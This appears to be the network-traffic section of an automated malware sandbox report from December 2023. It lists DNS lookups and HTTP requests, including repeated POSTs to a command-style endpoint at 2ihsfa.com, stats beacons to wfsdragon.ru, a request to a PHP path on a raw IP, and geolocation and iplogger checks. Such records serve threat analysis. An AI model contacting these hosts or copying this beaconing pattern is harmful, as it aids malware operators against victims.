                                                                                                              HTTP/1.1 405 Not Allowed
                                                                                                              Server: openresty
                                                                                                              Date: Sat, 30 Dec 2023 17:51:12 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 556
                                                                                                              Connection: keep-alive
                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
                                                                                                            • flag-us
                                                                                                              POST
                                                                                                              http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
                                                                                                              Remote address:
                                                                                                              13.248.169.48:80
                                                                                                              Request
                                                                                                              POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                              Content-Length: 266
                                                                                                              Host: uehge4g6gh.2ihsfa.com
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              146.78.124.51.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              146.78.124.51.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              146.78.124.51.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              146.78.124.51.in-addr.arpa
                                                                                                              IN PTR
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              146.78.124.51.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              146.78.124.51.in-addr.arpa
                                                                                                              IN PTR
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              www.iyiqian.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              www.iyiqian.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              www.iyiqian.com
                                                                                                              IN A
                                                                                                              34.143.166.163
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              www.iyiqian.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              www.iyiqian.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              www.iyiqian.com
                                                                                                              IN A
                                                                                                              34.143.166.163
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              www.iyiqian.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              www.iyiqian.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              www.facebook.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              www.facebook.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              www.facebook.com
                                                                                                              IN CNAME
                                                                                                              star-mini.c10r.facebook.com
                                                                                                              star-mini.c10r.facebook.com
                                                                                                              IN A
                                                                                                              157.240.221.35
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              secure.facebook.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              secure.facebook.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              secure.facebook.com
                                                                                                              IN CNAME
                                                                                                              secure.c10r.facebook.com
                                                                                                              secure.c10r.facebook.com
                                                                                                              IN A
                                                                                                              163.70.147.4
                                                                                                            • flag-sg
                                                                                                              GET
                                                                                                              http://www.iyiqian.com/
                                                                                                              Remote address:
                                                                                                              34.143.166.163:80
                                                                                                              Request
                                                                                                              GET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                                              Host: www.iyiqian.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Server: nginx
                                                                                                              Date: Sat, 30 Dec 2023 17:51:03 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: btst=; path=/; domain=.www.iyiqian.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                              Set-Cookie: btst=; path=/; domain=www.iyiqian.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                                                                                              Set-Cookie: btst=12e4ff322568ca3994d520e2c0ccdda0|89.149.23.59|1703958663|1703958663|0|1|0; path=/; domain=.iyiqian.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                              Set-Cookie: snkz=89.149.23.59; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              static.xx.fbcdn.net
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              static.xx.fbcdn.net
                                                                                                              IN A
                                                                                                              Response
                                                                                                              static.xx.fbcdn.net
                                                                                                              IN CNAME
                                                                                                              scontent.xx.fbcdn.net
                                                                                                              scontent.xx.fbcdn.net
                                                                                                              IN A
                                                                                                              163.70.147.23
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              static.xx.fbcdn.net
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              static.xx.fbcdn.net
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              35.221.240.157.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              35.221.240.157.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              35.221.240.157.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              edge-star-mini-shv-01-lhr8facebookcom
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              4.147.70.163.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              4.147.70.163.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              4.147.70.163.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              edge-secure-shv-01-lhr6facebookcom
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              227.179.250.142.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              227.179.250.142.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              227.179.250.142.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              lhr25s31-in-f31e100net
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              74.169.217.172.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              74.169.217.172.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              74.169.217.172.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              lhr48s09-in-f101e100net
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              23.147.70.163.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              23.147.70.163.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              23.147.70.163.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              xx-fbcdn-shv-01-lhr6fbcdnnet
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              23.147.70.163.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              23.147.70.163.in-addr.arpa
                                                                                                              IN PTR
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              163.166.143.34.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              163.166.143.34.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              163.166.143.34.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              16316614334bcgoogleusercontentcom
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              163.166.143.34.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              163.166.143.34.in-addr.arpa
                                                                                                              IN PTR
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              48.169.248.13.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              48.169.248.13.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              48.169.248.13.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              a904c694c05102f30awsglobalacceleratorcom
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              48.169.248.13.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              48.169.248.13.in-addr.arpa
                                                                                                              IN PTR
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              content-autofill.googleapis.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              142.250.200.42
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              142.250.200.10
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              216.58.201.106
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              216.58.204.74
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              172.217.169.10
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              142.250.179.234
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              142.250.180.10
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              142.250.187.202
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              142.250.187.234
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              172.217.16.234
                                                                                                              content-autofill.googleapis.com
                                                                                                              IN A
                                                                                                              142.250.178.10
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              facebook.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              facebook.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                              facebook.com
                                                                                                              IN A
                                                                                                              163.70.147.35
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              facebook.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              facebook.com
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              facebook.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              facebook.com
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              42.200.250.142.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              42.200.250.142.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                              42.200.250.142.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              lhr48s30-in-f101e100net
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              t.me
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              t.me
                                                                                                              IN A
                                                                                                              Response
                                                                                                              t.me
                                                                                                              IN A
                                                                                                              149.154.167.99
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              ninhaine.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              ninhaine.com
                                                                                                              IN TXT
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              ninhaine.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              ninhaine.com
                                                                                                              IN TXT
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              2makestorage.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              2makestorage.com
                                                                                                              IN TXT
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              2makestorage.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              2makestorage.com
                                                                                                              IN TXT
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              2makestorage.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              2makestorage.com
                                                                                                              IN TXT
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              99.167.154.149.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              99.167.154.149.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              nisdably.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              nisdably.com
                                                                                                              IN TXT
                                                                                                              Response
                                                                                                              nisdably.com
                                                                                                              IN TXT
                                                                                                              .v=spf1 include:_incspfcheck.mailspike.net ?all
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              nisdably.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              nisdably.com
                                                                                                              IN TXT
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              nisdably.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              nisdably.com
                                                                                                              IN TXT
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              nisdably.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              nisdably.com
                                                                                                              IN TXT
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              aucmoney.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              aucmoney.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              thegymmum.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              thegymmum.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com
                                                                                                              IN TXT
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              atvcampingtrips.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              atvcampingtrips.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              server2.ninhaine.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              server2.ninhaine.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              kuapakualaman.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              kuapakualaman.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              kuapakualaman.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              kuapakualaman.com
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              kuapakualaman.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              kuapakualaman.com
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              renatazarazua.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              renatazarazua.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              renatazarazua.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              renatazarazua.com
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              nasufmutlu.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              nasufmutlu.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              server2.ninhaine.com
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              server2.ninhaine.com
                                                                                                              IN A
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              spolaect.info
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              spolaect.info
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              spolaect.info
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              spolaect.info
                                                                                                              IN A
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              wfsdragon.ru
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              wfsdragon.ru
                                                                                                              IN A
                                                                                                              Response
                                                                                                              wfsdragon.ru
                                                                                                              IN A
                                                                                                              104.21.5.208
                                                                                                              wfsdragon.ru
                                                                                                              IN A
                                                                                                              172.67.133.215
                                                                                                            • flag-us
                                                                                                              GET
                                                                                                              http://wfsdragon.ru/api/setStats.php
                                                                                                              Remote address:
                                                                                                              104.21.5.208:80
                                                                                                              Request
                                                                                                              GET /api/setStats.php HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                              Host: wfsdragon.ru
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Date: Sat, 30 Dec 2023 17:51:29 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xMf9hJsjRB1ceStMTNv6T1DvX3AXRudPctCToORUoaMW3RBo6wuUJ3xPphBZUroDNkf5KT1Sr6v68o8wMBHEVJFPhPQ0VPx35m6W7WGjaT5zNXO2hoKUvDawAO2B%2FIY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 83dc21916cfb0691-LHR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              208.5.21.104.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              208.5.21.104.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              GET
                                                                                                              http://wfsdragon.ru/api/setStats.php
                                                                                                              Remote address:
                                                                                                              104.21.5.208:80
                                                                                                              Request
                                                                                                              GET /api/setStats.php HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                              Host: wfsdragon.ru
                                                                                                              Response
                                                                                                              HTTP/1.1 200 OK
                                                                                                              Date: Sat, 30 Dec 2023 17:51:31 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kKWFLyEIXwIJAxgFamSjC7fmRYIxxSkNckMb9bQLZAVopNtS0XBZjprkzTsiwNXAhK5AuX4EvyWlJ9vlpijInQTbK0cigYud7az96DK9MEMznYov3plzAh%2Bv3943aZA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 83dc219c5f45527f-LHR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              88.156.103.20.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              88.156.103.20.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              88.156.103.20.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              88.156.103.20.in-addr.arpa
                                                                                                              IN PTR
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              22.236.111.52.in-addr.arpa
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              22.236.111.52.in-addr.arpa
                                                                                                              IN PTR
                                                                                                              Response
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              tse1.mm.bing.net
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Request
                                                                                                              tse1.mm.bing.net
                                                                                                              IN A
                                                                                                              Response
                                                                                                              tse1.mm.bing.net
                                                                                                              IN CNAME
                                                                                                              mm-mm.bing.net.trafficmanager.net
                                                                                                              mm-mm.bing.net.trafficmanager.net
                                                                                                              IN CNAME
                                                                                                              dual-a-0001.a-msedge.net
                                                                                                              dual-a-0001.a-msedge.net
                                                                                                              IN A
                                                                                                              204.79.197.200
                                                                                                              dual-a-0001.a-msedge.net
                                                                                                              IN A
                                                                                                              13.107.21.200
                                                                                                            • flag-us
                                                                                                              DNS
                                                                                                              Remote address:
                                                                                                              8.8.8.8:53
                                                                                                              Response
                                                                                                            • 199.59.243.225:443
                                                                                                              www.listincode.com
                                                                                                              tls
                                                                                                              1.2kB
                                                                                                              5.0kB
                                                                                                              16
                                                                                                              12
                                                                                                            • 34.117.186.192:443
                                                                                                              ipinfo.io
                                                                                                              tls
                                                                                                              1.1kB
                                                                                                              6.8kB
                                                                                                              11
                                                                                                              11
                                                                                                            • 172.67.132.113:443
                                                                                                              iplogger.org
                                                                                                              tls
                                                                                                              918 B
                                                                                                              6.2kB
                                                                                                              10
                                                                                                              10
                                                                                                            • 37.0.8.235:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 208.95.112.1:80
                                                                                                              http://ip-api.com/json/
                                                                                                              http
                                                                                                              826 B
                                                                                                              662 B
                                                                                                              7
                                                                                                              4

                                                                                                              HTTP Request

                                                                                                              GET http://ip-api.com/json/

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 34.117.186.192:443
                                                                                                              ipinfo.io
                                                                                                              tls
                                                                                                              1.0kB
                                                                                                              6.8kB
                                                                                                              11
                                                                                                              11
                                                                                                            • 138.91.171.81:80
                                                                                                              52 B
                                                                                                              1
                                                                                                            • 172.67.132.113:443
                                                                                                              iplogger.org
                                                                                                              tls
                                                                                                              976 B
                                                                                                              1.8kB
                                                                                                              8
                                                                                                              6
                                                                                                            • 186.2.171.3:80
                                                                                                              http://186.2.171.3/seemorebty/il.php?e=md9_1sjm
                                                                                                              http
                                                                                                              1.0kB
                                                                                                              959 B
                                                                                                              5
                                                                                                              3

                                                                                                              HTTP Request

                                                                                                              GET http://186.2.171.3/seemorebty/il.php?e=md9_1sjm

                                                                                                              HTTP Response

                                                                                                              301
                                                                                                            • 186.2.171.3:443
                                                                                                              tls
                                                                                                              1.0kB
                                                                                                              1.9kB
                                                                                                              7
                                                                                                              6
                                                                                                            • 172.67.132.113:443
                                                                                                              iplogger.org
                                                                                                              tls
                                                                                                              2.5kB
                                                                                                              10.7kB
                                                                                                              21
                                                                                                              20
                                                                                                            • 2.56.59.245:80
                                                                                                              260 B
                                                                                                              5
                                                                                                            • 173.222.13.40:80
                                                                                                              http://x2.i.lencr.org/
                                                                                                              http
                                                                                                              397 B
                                                                                                              1.7kB
                                                                                                              6
                                                                                                              5

                                                                                                              HTTP Request

                                                                                                              GET http://x2.i.lencr.org/

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 163.70.147.35:443
                                                                                                              www.facebook.com
                                                                                                              tls
                                                                                                              7.5kB
                                                                                                              224.3kB
                                                                                                              118
                                                                                                              169
                                                                                                            • 173.222.13.40:80
                                                                                                              http://x2.c.lencr.org/
                                                                                                              http
                                                                                                              500 B
                                                                                                              721 B
                                                                                                              6
                                                                                                              3

                                                                                                              HTTP Request

                                                                                                              GET http://x2.c.lencr.org/

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 96.17.179.201:80
                                                                                                              http://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D
                                                                                                              http
                                                                                                              521 B
                                                                                                              862 B
                                                                                                              6
                                                                                                              3

                                                                                                              HTTP Request

                                                                                                              GET http://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 172.67.132.113:443
                                                                                                              iplogger.org
                                                                                                              tls
                                                                                                              1.6kB
                                                                                                              6.6kB
                                                                                                              16
                                                                                                              10
                                                                                                            • 185.107.56.199:443
                                                                                                              humisnee.com
                                                                                                              tls
                                                                                                              1.6kB
                                                                                                              5.3kB
                                                                                                              15
                                                                                                              12
                                                                                                            • 199.59.243.225:80
                                                                                                              http://survey-smiles.com/
                                                                                                              http
                                                                                                              377 B
                                                                                                              1.9kB
                                                                                                              5
                                                                                                              4

                                                                                                              HTTP Request

                                                                                                              GET http://survey-smiles.com/

                                                                                                              HTTP Response

                                                                                                              200
                                                                                                            • 13.248.169.48:80
                                                                                                              http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5
                                                                                                              http
                                                                                                              361.7kB
                                                                                                              533.3kB
                                                                                                              1053
                                                                                                              1236

                                                                                                              HTTP Request

                                                                                                              GET http://uehge4g6gh.2ihsfa.com/api/fbtime

                                                                                                              HTTP Response

                                                                                                              200

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

                                                                                                              POST http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

                                                                                                              HTTP Response

                                                                                                              405

                                                                                                              HTTP Request

